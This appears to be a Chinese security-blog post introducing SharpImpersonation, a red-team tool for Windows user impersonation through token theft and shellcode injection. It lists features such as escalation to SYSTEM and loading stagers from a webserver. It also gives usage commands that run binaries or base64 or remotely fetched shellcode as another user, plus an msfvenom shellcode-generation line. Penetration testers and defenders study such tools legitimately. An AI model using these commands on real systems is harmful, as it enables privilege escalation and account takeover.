SharpImpersonation是一款功能强大的用户模拟工具,该工具基于令牌机制和Shellcode注入技术实现其功能,可以帮助广大研究人员更好地对组织内部的网络环境和系统安全进行分析和测试。
该工具基于Tokenvator的代码库实现其功能,并对其部分代码进行了优化,同时还添加了还嗯多其他的功能,并且还参考借鉴了很多其他优秀的开源工具。
1、使用list参数枚举本地系统中的所有用户; 2、以非提权上下文枚举本地系统中的所有用户; 3、自动提权为“SYSTEM”; 4、搜索目标用户名的第一个进程,将其进程ID作为目标; 5、支持从Webserver加载Stager; 6、......
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/S3cur3Th1sSh1t/SharpImpersonation.git
PS > PS C:\temp> SharpImpersonation.exe list
PS > PS C:\temp> SharpImpersonation.exe list elevated
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
(向右滑动,查看更多)
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
(向右滑动,查看更多)
msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0
SharpImpersonation:
https://github.com/S3cur3Th1sSh1t/SharpImpersonation
https://github.com/0xbadjuju/Tokenvator https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/ https://lolbas-project.github.io/ https://thewover.github.io/Dynamic-Invoke/ https://github.com/TheWover/DInvoke https://github.com/djhohnstein/SharpChromium https://github.com/V1V1/SharpScribbles/tree/master/ThunderFox https://s3cur3th1ssh1t.github.io/On-how-to-access-protected-networks/ https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf